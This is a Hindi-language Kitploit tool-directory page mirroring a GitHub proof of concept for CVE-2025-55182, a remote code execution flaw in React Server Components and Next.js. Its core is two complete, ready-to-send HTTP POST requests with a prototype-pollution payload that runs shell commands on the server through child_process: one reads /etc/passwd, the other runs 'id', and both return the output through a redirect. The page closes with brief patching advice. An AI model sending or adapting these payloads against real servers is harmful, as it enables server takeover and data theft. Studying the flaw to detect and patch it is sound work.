Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell_cve-2025-55182 | Kitploit
उपकरण/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
8 महीने पहलेअभी तक समीक्षित नहीं

React Server Components RCE - CVE-2025-55182

नमस्ते! मुझे उम्मीद है कि आपका दिन बहुत बढ़िया चल रहा है! 😊✨

यह किस बारे में है?

React Server Components के संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0 में एक गंभीर सुरक्षा समस्या है। पैकेज react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack प्रभावित हैं।

यह समस्या तब होती है जब सर्वर अनुरोधों से डेटा को असुरक्षित तरीके से पढ़ता है। हमलावर विशेष डेटा भेज सकते हैं जो सर्वर को उनके कमांड चलाने के लिए मजबूर करता है।


प्रूफ ऑफ कॉन्सेप्ट - संपूर्ण हमले का उदाहरण

यहाँ संपूर्ण हमले का अनुरोध दिया गया है जो समस्या को दर्शाता है। मैंने कमांड को सुरक्षित उदाहरणों में बदल दिया है।

जिस वेबसाइट का आप परीक्षण कर रहे हैं, उसमें target-website.com को बदलें।

हमला अनुरोध #1 - सिस्टम फ़ाइल पढ़ें

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

हमला अनुरोध #2 - उपयोगकर्ता जानकारी जाँचें

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

सरल व्याख्या

  1. सर्वर अनुरोध से डेटा पढ़ता है
  2. खराब डेटा सर्वर को धोखा देकर कमांड चला सकता है
  3. हमलावर कोई भी कमांड चला सकते हैं जो वे चाहें
  4. कमांड हमारे द्वारा भेजे गए डेटा में छिपे होते हैं

क्या हो सकता है?

हमलावर यह कर सकते हैं:

  • सर्वर पर कोई भी कमांड चला सकते हैं
  • गुप्त फ़ाइलें पढ़ सकते हैं
  • सर्वर का नियंत्रण ले सकते हैं
  • सारा डेटा चुरा सकते हैं

इसे कैसे ठीक करें

React को तुरंत अपडेट करें! नवीनतम संस्करण प्राप्त करें जिसमें यह समस्या ठीक कर दी गई है।


उपयोगी लिंक

  • आधिकारिक स्कैनर टूल
  • तकनीकी विवरण
  • Facebook सुरक्षा सूचना
  • OpenWall सुरक्षा सूची
  • React आधिकारिक ब्लॉग
  • Next.js सुरक्षा सूचना
  • Vercel अपडेट सूचना

अपना ख्याल रखें और अपनी तरफ से सुरक्षित रहें! ✨❤️

टूल डाउनलोड करें